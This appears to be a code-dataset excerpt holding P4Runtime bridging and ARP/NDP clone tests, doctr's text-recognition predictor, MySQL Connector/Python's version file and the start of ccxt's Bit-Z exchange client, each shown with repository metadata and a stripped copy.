"hdr.ipv6.next_hdr": (ICMPV6_IP_PROTO, 0xff),
"hdr.icmpv6.type": (NA_ICMPV6_TYPE, 0xff)
},
action_name="IngressPipeImpl.clone_to_cpu",
priority=DEFAULT_PRIORITY
))
testutils.send_packet(self, self.port1, str(pkt))
# Pkt should be received on CPU via PacketIn...
# Expected P4Runtime PacketIn message.
exp_packet_in_msg = self.helper.build_packet_in(
payload=str(pkt),
metadata={
"ingress_port": self.port1,
"_pad": 0
})
self.verify_packet_in(exp_packet_in_msg)
# ..and on port2 as indicated by the L2 unicast rule.
testutils.verify_packet(self, pkt, self.port2)
@group("bridging")
class BridgingTest(P4RuntimeTest):
"""Tests basic L2 unicast forwarding"""
def runTest(self):
# Test with different type of packets.
for pkt_type in ["tcp", "udp", "icmp", "tcpv6", "udpv6", "icmpv6"]:
print_inline("%s ... " % pkt_type)
pkt = getattr(testutils, "simple_%s_packet" % pkt_type)(pktlen=120)
self.testPacket(pkt)
@autocleanup
def testPacket(self, pkt):
# Insert L2 unicast entry, match on pkt's eth dst address.
# TODO EXERCISE 2
# Modify names to match content of P4Info file (look for the fully
# qualified name of tables, match fields, and actions.
# ---- START SOLUTION ----
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_exact_table",
match_fields={
# Exact match.
"hdr.ethernet.dst_addr": pkt[Ether].dst
},
action_name="IngressPipeImpl.set_egress_port",
action_params={
"port_num": self.port2
}
))
# ---- END SOLUTION ----
# Test bidirectional forwarding by swapping MAC addresses on the pkt
pkt2 = pkt_mac_swap(pkt.copy())
# Insert L2 unicast entry for pkt2.
# TODO EXERCISE 2
# Modify names to match content of P4Info file (look for the fully
# qualified name of tables, match fields, and actions.
# ---- START SOLUTION ----
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_exact_table",
match_fields={
# Exact match.
"hdr.ethernet.dst_addr": pkt2[Ether].dst
},
action_name="IngressPipeImpl.set_egress_port",
action_params={
"port_num": self.port1
}
))
# ---- END SOLUTION ----
# Send and verify.
testutils.send_packet(self, self.port1, str(pkt))
testutils.send_packet(self, self.port2, str(pkt2))
testutils.verify_each_packet_on_each_port(
self, [pkt, pkt2], [self.port2, self.port1])
| 35.479365 | 80 | 0.576503 |
from ptf.testutils import group
from base_test import *
CPU_CLONE_SESSION_ID = 99
@group("bridging")
class ArpNdpRequestWithCloneTest(P4RuntimeTest):
    """Tests that broadcast ARP requests and multicast NDP Neighbor
    Solicitations are both flooded via a multicast group and cloned to the
    CPU port as P4Runtime PacketIn messages."""
    def runTest(self):
        print_inline("ARP request ... ")
        arp_pkt = testutils.simple_arp_packet()
        self.testPacket(arp_pkt)
        print_inline("NDP NS ... ")
        ndp_pkt = genNdpNsPkt(src_mac=HOST1_MAC, src_ip=HOST1_IPV6,
                              target_ip=HOST2_IPV6)
        self.testPacket(ndp_pkt)
    @autocleanup
    def testPacket(self, pkt):
        """Programs flooding + CPU-clone rules, then injects pkt on each port
        and verifies PacketIn plus replication to all other ports."""
        mcast_group_id = 10
        mcast_ports = [self.port1, self.port2, self.port3]
        # Multicast group replicating to all three test ports.
        self.insert_pre_multicast_group(
            group_id=mcast_group_id,
            ports=mcast_ports)
        # Flood Ethernet broadcast (ARP requests).
        self.insert(self.helper.build_table_entry(
            table_name="IngressPipeImpl.l2_ternary_table",
            match_fields={
                "hdr.ethernet.dst_addr": (
                    "FF:FF:FF:FF:FF:FF",
                    "FF:FF:FF:FF:FF:FF")
            },
            action_name="IngressPipeImpl.set_multicast_group",
            action_params={
                "gid": mcast_group_id
            },
            priority=DEFAULT_PRIORITY
        ))
        # Flood IPv6 multicast MACs (33:33:...) used by NDP.
        self.insert(self.helper.build_table_entry(
            table_name="IngressPipeImpl.l2_ternary_table",
            match_fields={
                "hdr.ethernet.dst_addr": (
                    "33:33:00:00:00:00",
                    "FF:FF:00:00:00:00")
            },
            action_name="IngressPipeImpl.set_multicast_group",
            action_params={
                "gid": mcast_group_id
            },
            priority=DEFAULT_PRIORITY
        ))
        # Clone session delivering copies to the CPU port.
        self.insert_pre_clone_session(
            session_id=CPU_CLONE_SESSION_ID,
            ports=[self.cpu_port])
        # ACL: clone all ARP packets to CPU.
        self.insert(self.helper.build_table_entry(
            table_name="IngressPipeImpl.acl_table",
            match_fields={
                "hdr.ethernet.ether_type": (ARP_ETH_TYPE, 0xffff)
            },
            action_name="IngressPipeImpl.clone_to_cpu",
            priority=DEFAULT_PRIORITY
        ))
        # ACL: clone NDP Neighbor Solicitation (ICMPv6 type NS) to CPU.
        self.insert(self.helper.build_table_entry(
            table_name="IngressPipeImpl.acl_table",
            match_fields={
                "hdr.ethernet.ether_type": (IPV6_ETH_TYPE, 0xffff),
                "hdr.ipv6.next_hdr": (ICMPV6_IP_PROTO, 0xff),
                "hdr.icmpv6.type": (NS_ICMPV6_TYPE, 0xff)
            },
            action_name="IngressPipeImpl.clone_to_cpu",
            priority=DEFAULT_PRIORITY
        ))
        for inport in mcast_ports:
            testutils.send_packet(self, inport, str(pkt))
            # Expect a CPU copy first...
            exp_packet_in_msg = self.helper.build_packet_in(
                payload=str(pkt),
                metadata={
                    "ingress_port": inport,
                    "_pad": 0
                })
            self.verify_packet_in(exp_packet_in_msg)
            # ...then one replica on every port except the ingress one.
            verify_ports = set(mcast_ports)
            verify_ports.discard(inport)
            for port in verify_ports:
                testutils.verify_packet(self, pkt, port)
        testutils.verify_no_other_packets(self)
@group("bridging")
class ArpNdpReplyWithCloneTest(P4RuntimeTest):
    """Tests that unicast ARP replies and NDP Neighbor Advertisements are
    both forwarded via the L2 exact table and cloned to the CPU port."""
    def runTest(self):
        print_inline("ARP reply ... ")
        arp_pkt = testutils.simple_arp_packet(
            eth_src=HOST1_MAC, eth_dst=HOST2_MAC, arp_op=2)
        self.testPacket(arp_pkt)
        print_inline("NDP NA ... ")
        ndp_pkt = genNdpNaPkt(target_ip=HOST1_IPV6, target_mac=HOST1_MAC)
        self.testPacket(ndp_pkt)
    @autocleanup
    def testPacket(self, pkt):
        """Programs an L2 unicast rule and CPU-clone ACL rules, then sends
        pkt on port1 and expects both a PacketIn and delivery on port2."""
        # TODO EXERCISE 2
        # Modify names to match content of P4Info file (look for the fully
        # qualified name of tables, match fields, and actions.
        # ---- START SOLUTION ----
        self.insert(self.helper.build_table_entry(
            table_name="IngressPipeImpl.l2_exact_table",
            match_fields={
                # Exact match.
                "hdr.ethernet.dst_addr": pkt[Ether].dst
            },
            action_name="IngressPipeImpl.set_egress_port",
            action_params={
                "port_num": self.port2
            }
        ))
        # ---- END SOLUTION ----
        # CPU clone session.
        self.insert_pre_clone_session(
            session_id=CPU_CLONE_SESSION_ID,
            ports=[self.cpu_port])
        # ACL entry to clone ARPs
        self.insert(self.helper.build_table_entry(
            table_name="IngressPipeImpl.acl_table",
            match_fields={
                # Ternary match.
                "hdr.ethernet.ether_type": (ARP_ETH_TYPE, 0xffff)
            },
            action_name="IngressPipeImpl.clone_to_cpu",
            priority=DEFAULT_PRIORITY
        ))
        # ACL entry to clone NDP Neighbor Solicitation
        self.insert(self.helper.build_table_entry(
            table_name="IngressPipeImpl.acl_table",
            match_fields={
                # Ternary match.
                "hdr.ethernet.ether_type": (IPV6_ETH_TYPE, 0xffff),
                "hdr.ipv6.next_hdr": (ICMPV6_IP_PROTO, 0xff),
                "hdr.icmpv6.type": (NA_ICMPV6_TYPE, 0xff)
            },
            action_name="IngressPipeImpl.clone_to_cpu",
            priority=DEFAULT_PRIORITY
        ))
        testutils.send_packet(self, self.port1, str(pkt))
        # Pkt should be received on CPU via PacketIn...
        # Expected P4Runtime PacketIn message.
        exp_packet_in_msg = self.helper.build_packet_in(
            payload=str(pkt),
            metadata={
                "ingress_port": self.port1,
                "_pad": 0
            })
        self.verify_packet_in(exp_packet_in_msg)
        # ..and on port2 as indicated by the L2 unicast rule.
        testutils.verify_packet(self, pkt, self.port2)
@group("bridging")
class BridgingTest(P4RuntimeTest):
    """Verifies basic bidirectional L2 unicast forwarding for several
    packet types (IPv4/IPv6 TCP, UDP and ICMP)."""
    def runTest(self):
        # Exercise the same bridging scenario with a variety of payloads.
        packet_types = ("tcp", "udp", "icmp", "tcpv6", "udpv6", "icmpv6")
        for name in packet_types:
            print_inline("%s ... " % name)
            builder = getattr(testutils, "simple_%s_packet" % name)
            self.testPacket(builder(pktlen=120))
    @autocleanup
    def testPacket(self, pkt):
        """Installs one L2 exact-match entry per direction and checks that
        packets are forwarded both ways."""
        swapped = pkt_mac_swap(pkt.copy())
        # One unicast rule per direction: dst MAC -> egress port.
        for packet, egress in ((pkt, self.port2), (swapped, self.port1)):
            self.insert(self.helper.build_table_entry(
                table_name="IngressPipeImpl.l2_exact_table",
                match_fields={
                    "hdr.ethernet.dst_addr": packet[Ether].dst
                },
                action_name="IngressPipeImpl.set_egress_port",
                action_params={
                    "port_num": egress
                }
            ))
        testutils.send_packet(self, self.port1, str(pkt))
        testutils.send_packet(self, self.port2, str(swapped))
        testutils.verify_each_packet_on_each_port(
            self, [pkt, swapped], [self.port2, self.port1])
| true | true |
f7231f3c31bbf1b8dd50af718421432779336757 | 2,551 | py | Python | doctr/models/recognition/predictor/pytorch.py | thentgesMindee/doctr | f97e92ba1b7bcb785a60f2cf549f13f88e510609 | [
"Apache-2.0"
] | null | null | null | doctr/models/recognition/predictor/pytorch.py | thentgesMindee/doctr | f97e92ba1b7bcb785a60f2cf549f13f88e510609 | [
"Apache-2.0"
] | null | null | null | doctr/models/recognition/predictor/pytorch.py | thentgesMindee/doctr | f97e92ba1b7bcb785a60f2cf549f13f88e510609 | [
"Apache-2.0"
] | 1 | 2022-01-27T09:25:05.000Z | 2022-01-27T09:25:05.000Z | # Copyright (C) 2021, Mindee.
# This program is licensed under the Apache License version 2.
# See LICENSE or go to <https://www.apache.org/licenses/LICENSE-2.0.txt> for full license details.
from typing import Any, List, Tuple, Union
import numpy as np
import torch
from torch import nn
from doctr.models.preprocessor import PreProcessor
from ._utils import remap_preds, split_crops
__all__ = ['RecognitionPredictor']
class RecognitionPredictor(nn.Module):
    """Implements an object able to identify character sequences in images
    Args:
        pre_processor: transform inputs for easier batched model inference
        model: core detection architecture
        split_wide_crops: wether to use crop splitting for high aspect ratio crops
    """
    def __init__(
        self,
        pre_processor: PreProcessor,
        model: nn.Module,
        split_wide_crops: bool = True,
    ) -> None:
        super().__init__()
        self.pre_processor = pre_processor
        self.model = model.eval()
        self.split_wide_crops = split_wide_crops
        self.critical_ar = 8  # Critical aspect ratio
        self.dil_factor = 1.4  # Dilation factor to overlap the crops
        self.target_ar = 4  # Target aspect ratio
    @torch.no_grad()
    def forward(
        self,
        crops: List[Union[np.ndarray, torch.Tensor]],
        **kwargs: Any,
    ) -> List[Tuple[str, float]]:
        """Recognize the text in each crop.

        Args:
            crops: list of HWC images (np.ndarray or torch.Tensor)
            **kwargs: forwarded to the underlying model call

        Returns:
            one (text, confidence) tuple per input crop

        Raises:
            ValueError: if any crop is not a 3-dimensional array
        """
        if len(crops) == 0:
            return []
        # Dimension check
        if any(crop.ndim != 3 for crop in crops):
            raise ValueError("incorrect input shape: all crops are expected to be multi-channel 2D images.")
        # Split crops that are too wide
        remapped = False
        if self.split_wide_crops:
            new_crops, crop_map, remapped = split_crops(
                crops,
                self.critical_ar,
                self.target_ar,
                self.dil_factor,
                isinstance(crops[0], np.ndarray)
            )
            if remapped:
                crops = new_crops
        # Resize & batch them
        processed_batches = self.pre_processor(crops)
        # Forward it
        raw = [
            self.model(batch, return_preds=True, **kwargs)['preds']  # type: ignore[operator]
            for batch in processed_batches
        ]
        # Process outputs
        out = [charseq for batch in raw for charseq in batch]
        # Remap crops: merge sub-crop predictions back to one per input crop
        if self.split_wide_crops and remapped:
            out = remap_preds(out, crop_map, self.dil_factor)
        return out
| 29.662791 | 108 | 0.618189 |
from typing import Any, List, Tuple, Union
import numpy as np
import torch
from torch import nn
from doctr.models.preprocessor import PreProcessor
from ._utils import remap_preds, split_crops
__all__ = ['RecognitionPredictor']
class RecognitionPredictor(nn.Module):
    """Identifies character sequences in word crops.

    Args:
        pre_processor: transform inputs for easier batched model inference
        model: core recognition architecture
        split_wide_crops: whether to split crops with a high aspect ratio
    """
    def __init__(
        self,
        pre_processor: PreProcessor,
        model: nn.Module,
        split_wide_crops: bool = True,
    ) -> None:
        super().__init__()
        self.pre_processor = pre_processor
        self.model = model.eval()
        self.split_wide_crops = split_wide_crops
        # Aspect ratio above which a crop gets split into sub-crops
        self.critical_ar = 8
        # Overlap (dilation) factor between consecutive sub-crops
        self.dil_factor = 1.4
        # Aspect ratio targeted by the splitting
        self.target_ar = 4
    @torch.no_grad()
    def forward(
        self,
        crops: List[Union[np.ndarray, torch.Tensor]],
        **kwargs: Any,
    ) -> List[Tuple[str, float]]:
        """Return one (text, confidence) tuple per input crop."""
        if not crops:
            return []
        # Every crop must be a multi-channel 2D image.
        if any(crop.ndim != 3 for crop in crops):
            raise ValueError("incorrect input shape: all crops are expected to be multi-channel 2D images.")
        # Optionally split very wide crops into overlapping sub-crops.
        remapped = False
        crop_map = None
        if self.split_wide_crops:
            split, crop_map, remapped = split_crops(
                crops,
                self.critical_ar,
                self.target_ar,
                self.dil_factor,
                isinstance(crops[0], np.ndarray)
            )
            if remapped:
                crops = split
        # Preprocess into batches and run inference, flattening the results.
        word_preds = []
        for batch in self.pre_processor(crops):
            word_preds.extend(self.model(batch, return_preds=True, **kwargs)['preds'])
        # Merge sub-crop predictions back into one prediction per crop.
        if self.split_wide_crops and remapped:
            word_preds = remap_preds(word_preds, crop_map, self.dil_factor)
        return word_preds
| true | true |
f7232002e9161baa044ee70c9064979f5ef015f3 | 1,562 | py | Python | Parsers/mysql/connector/version.py | bopopescu/py-try | 2e5638fad47dd4a2ab1f872d76063e405b3cadda | [
"MIT"
] | null | null | null | Parsers/mysql/connector/version.py | bopopescu/py-try | 2e5638fad47dd4a2ab1f872d76063e405b3cadda | [
"MIT"
] | null | null | null | Parsers/mysql/connector/version.py | bopopescu/py-try | 2e5638fad47dd4a2ab1f872d76063e405b3cadda | [
"MIT"
] | 1 | 2020-07-23T17:44:13.000Z | 2020-07-23T17:44:13.000Z | # MySQL Connector/Python - MySQL driver written in Python.
# Copyright (c) 2012, 2015, Oracle and/or its affiliates. All rights reserved.
# MySQL Connector/Python is licensed under the terms of the GPLv2
# <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>, like most
# MySQL Connectors. There are special exceptions to the terms and
# conditions of the GPLv2 as it is applied to this software, see the
# FOSS License Exception
# <http://www.mysql.com/about/legal/licensing/foss-exception.html>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""MySQL Connector/Python version information
The file version.py gets installed and is available after installation
as )_mysql.connector.version.
"""
# Version as a 5-tuple: (major, minor, patch, pre-release suffix, serial).
VERSION = (2, 0, 4, '', 0)

# The suffix and serial are only appended when both are truthy.
if VERSION[3] and VERSION[4]:
    VERSION_TEXT = '{0}.{1}.{2}{3}{4}'.format(*VERSION)
else:
    VERSION_TEXT = '.'.join(str(part) for part in VERSION[0:3])

LICENSE = 'GPLv2 with FOSS License Exception'
# Added in package names, after the version
EDITION = ''
| 41.105263 | 78 | 0.744558 |
# MySQL Connector/Python version information.
VERSION = (2, 0, 4, '', 0)

_major, _minor, _patch, _suffix, _serial = VERSION
if _suffix and _serial:
    # Full form including the pre-release suffix and serial number.
    VERSION_TEXT = '{0}.{1}.{2}{3}{4}'.format(*VERSION)
else:
    VERSION_TEXT = '{0}.{1}.{2}'.format(_major, _minor, _patch)

LICENSE = 'GPLv2 with FOSS License Exception'
# Appended to package names, after the version.
EDITION = ''
| true | true |
f72320646603967b7d2c54156d4ac3cb57b612b6 | 50,455 | py | Python | python/ccxt/bitz.py | Huangyi5458/ccxt | 1e01d03dac18633eb73998d7cb279535395368e9 | [
"MIT"
] | 13 | 2020-11-24T12:15:42.000Z | 2022-03-11T00:46:39.000Z | python/ccxt/bitz.py | Huangyi5458/ccxt | 1e01d03dac18633eb73998d7cb279535395368e9 | [
"MIT"
] | null | null | null | python/ccxt/bitz.py | Huangyi5458/ccxt | 1e01d03dac18633eb73998d7cb279535395368e9 | [
"MIT"
] | 1 | 2022-01-01T15:54:52.000Z | 2022-01-01T15:54:52.000Z | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import OnMaintenance
class bitz(Exchange):
    def describe(self):
        """Return the static exchange description merged over the ccxt base:
        endpoints, capability flags, timeframes, fee schedule, precision
        defaults, currency aliases and API error-code mapping."""
        return self.deep_extend(super(bitz, self).describe(), {
            'id': 'bitz',
            'name': 'Bit-Z',
            'countries': ['HK'],
            'rateLimit': 2000,
            'version': 'v2',
            'userAgent': self.userAgents['chrome'],
            'has': {
                'cancelOrder': True,
                'cancelOrders': True,
                'createOrder': True,
                'createMarketOrder': False,
                'fetchBalance': True,
                'fetchDeposits': True,
                'fetchClosedOrders': True,
                'fetchMarkets': True,
                'fetchOHLCV': True,
                'fetchOpenOrders': True,
                'fetchOrder': True,
                'fetchOrderBook': True,
                'fetchOrders': True,
                'fetchTicker': True,
                'fetchTickers': True,
                'fetchTime': True,
                'fetchTrades': True,
                'fetchTransactions': False,
                'fetchWithdrawals': True,
                'withdraw': True,
            },
            'timeframes': {
                '1m': '1min',
                '5m': '5min',
                '15m': '15min',
                '30m': '30min',
                '1h': '60min',
                '4h': '4hour',
                '1d': '1day',
                '5d': '5day',
                '1w': '1week',
                '1M': '1mon',
            },
            'hostname': 'apiv2.bitz.com',
            'urls': {
                'logo': 'https://user-images.githubusercontent.com/51840849/87443304-fec5e000-c5fd-11ea-98f8-ba8e67f7eaff.jpg',
                'api': {
                    'market': 'https://{hostname}',
                    'trade': 'https://{hostname}',
                    'assets': 'https://{hostname}',
                },
                'www': 'https://www.bitz.com',
                'doc': 'https://apidoc.bitz.com/en/',
                'fees': 'https://www.bitz.com/fee?type=1',
                'referral': 'https://u.bitz.com/register?invite_code=1429193',
            },
            'api': {
                'market': {
                    'get': [
                        'ticker',
                        'depth',
                        'order',  # trades
                        'tickerall',
                        'kline',
                        'symbolList',
                        'getServerTime',
                        'currencyRate',
                        'currencyCoinRate',
                        'coinRate',
                    ],
                },
                'trade': {
                    'post': [
                        'addEntrustSheet',
                        'cancelEntrustSheet',
                        'cancelAllEntrustSheet',
                        'coinOut',  # withdraw
                        'getUserHistoryEntrustSheet',  # closed orders
                        'getUserNowEntrustSheet',  # open orders
                        'getEntrustSheetInfo',  # order
                        'depositOrWithdraw',  # transactions
                    ],
                },
                'assets': {
                    'post': [
                        'getUserAssets',
                    ],
                },
            },
            'fees': {
                'trading': {
                    'maker': 0.002,
                    'taker': 0.002,
                },
                'funding': {
                    # Percentage strings are resolved by the exchange, not ccxt.
                    'withdraw': {
                        'BTC': '0.5%',
                        'DKKT': '0.5%',
                        'ETH': 0.01,
                        'USDT': '0.5%',
                        'LTC': '0.5%',
                        'FCT': '0.5%',
                        'LSK': '0.5%',
                        'HXI': '0.8%',
                        'ZEC': '0.5%',
                        'DOGE': '0.5%',
                        'MZC': '0.5%',
                        'ETC': '0.5%',
                        'GXS': '0.5%',
                        'XPM': '0.5%',
                        'PPC': '0.5%',
                        'BLK': '0.5%',
                        'XAS': '0.5%',
                        'HSR': '0.5%',
                        'NULS': 5.0,
                        'VOISE': 350.0,
                        'PAY': 1.5,
                        'EOS': 0.6,
                        'YBCT': 35.0,
                        'OMG': 0.3,
                        'OTN': 0.4,
                        'BTX': '0.5%',
                        'QTUM': '0.5%',
                        'DASH': '0.5%',
                        'GAME': '0.5%',
                        'BCH': '0.5%',
                        'GNT': 9.0,
                        'SSS': 1500.0,
                        'ARK': '0.5%',
                        'PART': '0.5%',
                        'LEO': '0.5%',
                        'DGB': '0.5%',
                        'ZSC': 130.0,
                        'VIU': 350.0,
                        'BTG': '0.5%',
                        'ARN': 10.0,
                        'VTC': '0.5%',
                        'BCD': '0.5%',
                        'TRX': 200.0,
                        'HWC': '0.5%',
                        'UNIT': '0.5%',
                        'OXY': '0.5%',
                        'MCO': 0.3500,
                        'SBTC': '0.5%',
                        'BCX': '0.5%',
                        'ETF': '0.5%',
                        'PYLNT': 0.4000,
                        'XRB': '0.5%',
                        'ETP': '0.5%',
                    },
                },
            },
            'precision': {
                'amount': 8,
                'price': 8,
            },
            'options': {
                'fetchOHLCVVolume': True,
                'fetchOHLCVWarning': True,
                'lastNonceTimestamp': 0,
            },
            'commonCurrencies': {
                # https://github.com/ccxt/ccxt/issues/3881
                # https://support.bit-z.pro/hc/en-us/articles/360007500654-BOX-BOX-Token-
                'BOX': 'BOX Token',
                'LEO': 'LeoCoin',
                'XRB': 'NANO',
                'PXC': 'Pixiecoin',
                'VTC': 'VoteCoin',
                'TTC': 'TimesChain',
            },
            'exceptions': {
                # '200': Success
                '-102': ExchangeError,  # Invalid parameter
                '-103': AuthenticationError,  # Verification failed
                '-104': ExchangeNotAvailable,  # Network Error-1
                '-105': AuthenticationError,  # Invalid api signature
                '-106': ExchangeNotAvailable,  # Network Error-2
                '-109': AuthenticationError,  # Invalid scretKey
                '-110': DDoSProtection,  # The number of access requests exceeded
                '-111': PermissionDenied,  # Current IP is not in the range of trusted IP
                '-112': OnMaintenance,  # Service is under maintenance
                '-114': RateLimitExceeded,  # The number of daily requests has reached the limit
                '-117': AuthenticationError,  # The apikey expires
                '-100015': AuthenticationError,  # Trade password error
                '-100044': ExchangeError,  # Fail to request data
                '-100101': ExchangeError,  # Invalid symbol
                '-100201': ExchangeError,  # Invalid symbol
                '-100301': ExchangeError,  # Invalid symbol
                '-100401': ExchangeError,  # Invalid symbol
                '-100302': ExchangeError,  # Type of K-line error
                '-100303': ExchangeError,  # Size of K-line error
                '-200003': AuthenticationError,  # Please set trade password
                '-200005': PermissionDenied,  # This account can not trade
                '-200025': ExchangeNotAvailable,  # Temporary trading halt
                '-200027': InvalidOrder,  # Price Error
                '-200028': InvalidOrder,  # Amount must be greater than 0
                '-200029': InvalidOrder,  # Number must be between %s and %d
                '-200030': InvalidOrder,  # Over price range
                '-200031': InsufficientFunds,  # Insufficient assets
                '-200032': ExchangeError,  # System error. Please contact customer service
                '-200033': ExchangeError,  # Fail to trade
                '-200034': OrderNotFound,  # The order does not exist
                '-200035': OrderNotFound,  # Cancellation error, order filled
                '-200037': InvalidOrder,  # Trade direction error
                '-200038': ExchangeError,  # Trading Market Error
                '-200055': OrderNotFound,  # Order record does not exist
                '-300069': AuthenticationError,  # api_key is illegal
                '-300101': ExchangeError,  # Transaction type error
                '-300102': InvalidOrder,  # Price or number cannot be less than 0
                '-300103': AuthenticationError,  # Trade password error
                '-301001': ExchangeNotAvailable,  # Network Error-3
            },
        })
    def fetch_markets(self, params={}):
        """Fetch all trading pairs from GET /Market/symbolList and convert
        them to unified ccxt market structures (one dict per symbol)."""
        response = self.marketGetSymbolList(params)
        #
        #     {    status:    200,
        #              msg:   "",
        #             data: {   ltc_btc: {          id: "1",
        #                                          name: "ltc_btc",
        #                                      coinFrom: "ltc",
        #                                        coinTo: "btc",
        #                                   numberFloat: "4",
        #                                    priceFloat: "8",
        #                                        status: "1",
        #                                      minTrade: "0.010",
        #                                      maxTrade: "500000000.000"},
        #                    qtum_usdt: {          id: "196",
        #                                        name: "qtum_usdt",
        #                                    coinFrom: "qtum",
        #                                      coinTo: "usdt",
        #                                 numberFloat: "4",
        #                                  priceFloat: "2",
        #                                      status: "1",
        #                                    minTrade: "0.100",
        #                                    maxTrade: "500000000.000"},  },
        #             time:    1535969146,
        #        microtime:   "0.66955600 1535969146",
        #           source:   "api"                                           }
        #
        markets = self.safe_value(response, 'data')
        ids = list(markets.keys())
        result = []
        for i in range(0, len(ids)):
            id = ids[i]
            market = markets[id]
            numericId = self.safe_string(market, 'id')
            baseId = self.safe_string(market, 'coinFrom')
            quoteId = self.safe_string(market, 'coinTo')
            base = baseId.upper()
            quote = quoteId.upper()
            base = self.safe_currency_code(base)
            quote = self.safe_currency_code(quote)
            symbol = base + '/' + quote
            # numberFloat/priceFloat are decimal-place counts.
            precision = {
                'amount': self.safe_integer(market, 'numberFloat'),
                'price': self.safe_integer(market, 'priceFloat'),
            }
            result.append({
                'info': market,
                'id': id,
                'numericId': numericId,
                'symbol': symbol,
                'base': base,
                'quote': quote,
                'baseId': baseId,
                'quoteId': quoteId,
                'active': True,
                'precision': precision,
                'limits': {
                    'amount': {
                        'min': self.safe_float(market, 'minTrade'),
                        'max': self.safe_float(market, 'maxTrade'),
                    },
                    'price': {
                        'min': math.pow(10, -precision['price']),
                        'max': None,
                    },
                    'cost': {
                        'min': None,
                        'max': None,
                    },
                },
            })
        return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.assetsPostGetUserAssets(params)
#
# {
# status: 200,
# msg: "",
# data: {
# cny: 0,
# usd: 0,
# btc_total: 0,
# info: [{
# "name": "zpr",
# "num": "37.49067275",
# "over": "37.49067275",
# "lock": "0.00000000",
# "btc": "0.00000000",
# "usd": "0.00000000",
# "cny": "0.00000000",
# }],
# },
# time: 1535983966,
# microtime: "0.70400500 1535983966",
# source: "api",
# }
#
balances = self.safe_value(response['data'], 'info')
result = {'info': response}
for i in range(0, len(balances)):
balance = balances[i]
currencyId = self.safe_string(balance, 'name')
code = self.safe_currency_code(currencyId)
account = self.account()
account['used'] = self.safe_float(balance, 'lock')
account['total'] = self.safe_float(balance, 'num')
account['free'] = self.safe_float(balance, 'over')
result[code] = account
return self.parse_balance(result)
    def parse_ticker(self, ticker, market=None):
        """Convert an exchange ticker dict into the unified ccxt ticker
        structure; the timestamp is left None and filled in by callers."""
        #
        #      {          symbol: "eth_btc",
        #            quoteVolume: "3905.72",
        #                 volume: "97058.21",
        #            priceChange: "-1.72",
        #         priceChange24h: "-1.65",
        #               askPrice: "0.03971272",
        #                 askQty: "0.0663",
        #               bidPrice: "0.03961469",
        #                 bidQty: "19.5451",
        #                   open: "0.04036769",
        #                   high: "0.04062988",
        #                    low: "0.03956123",
        #                    now: "0.03970100",
        #                firstId: 115567767,
        #                 lastId: 115795316,
        #              dealCount: 14078,
        #        numberPrecision: 4,
        #         pricePrecision: 8,
        #                    cny: "1959.05",
        #                    usd: "287.10",
        #                    krw: "318655.82"   }
        #
        timestamp = None
        marketId = self.safe_string(ticker, 'symbol')
        symbol = self.safe_symbol(marketId, market, '_')
        last = self.safe_float(ticker, 'now')
        open = self.safe_float(ticker, 'open')
        change = None
        average = None
        # Derive change/average locally; 'priceChange' is a percentage string.
        if last is not None and open is not None:
            change = last - open
            average = self.sum(last, open) / 2
        return {
            'symbol': symbol,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'high': self.safe_float(ticker, 'high'),
            'low': self.safe_float(ticker, 'low'),
            'bid': self.safe_float(ticker, 'bidPrice'),
            'bidVolume': self.safe_float(ticker, 'bidQty'),
            'ask': self.safe_float(ticker, 'askPrice'),
            'askVolume': self.safe_float(ticker, 'askQty'),
            'vwap': None,
            'open': open,
            'close': last,
            'last': last,
            'previousClose': None,
            'change': change,
            'percentage': self.safe_float(ticker, 'priceChange24h'),
            'average': average,
            'baseVolume': self.safe_float(ticker, 'volume'),
            'quoteVolume': self.safe_float(ticker, 'quoteVolume'),
            'info': ticker,
        }
def parse_microtime(self, microtime):
if microtime is None:
return microtime
parts = microtime.split(' ')
milliseconds = float(parts[0])
seconds = int(parts[1])
total = self.sum(seconds, milliseconds)
return int(total * 1000)
    def fetch_ticker(self, symbol, params={}):
        """Fetch a single ticker from GET /Market/ticker and return the
        unified structure, timestamped from the response 'microtime'."""
        self.load_markets()
        market = self.market(symbol)
        request = {
            'symbol': market['id'],
        }
        response = self.marketGetTicker(self.extend(request, params))
        #
        #     {    status:    200,
        #              msg:   "",
        #             data: {          symbol: "eth_btc",
        #                         quoteVolume: "3905.72",
        #                              volume: "97058.21",
        #                         priceChange: "-1.72",
        #                      priceChange24h: "-1.65",
        #                            askPrice: "0.03971272",
        #                              askQty: "0.0663",
        #                            bidPrice: "0.03961469",
        #                              bidQty: "19.5451",
        #                                open: "0.04036769",
        #                                high: "0.04062988",
        #                                 low: "0.03956123",
        #                                 now: "0.03970100",
        #                             firstId:  115567767,
        #                              lastId:  115795316,
        #                           dealCount:  14078,
        #                     numberPrecision:  4,
        #                      pricePrecision:  8,
        #                                 cny: "1959.05",
        #                                 usd: "287.10",
        #                                 krw: "318655.82"   },
        #             time:    1535970397,
        #        microtime:   "0.76341900 1535970397",
        #           source:   "api"                             }
        #
        ticker = self.parse_ticker(response['data'], market)
        timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
        return self.extend(ticker, {
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
        })
    def fetch_tickers(self, symbols=None, params={}):
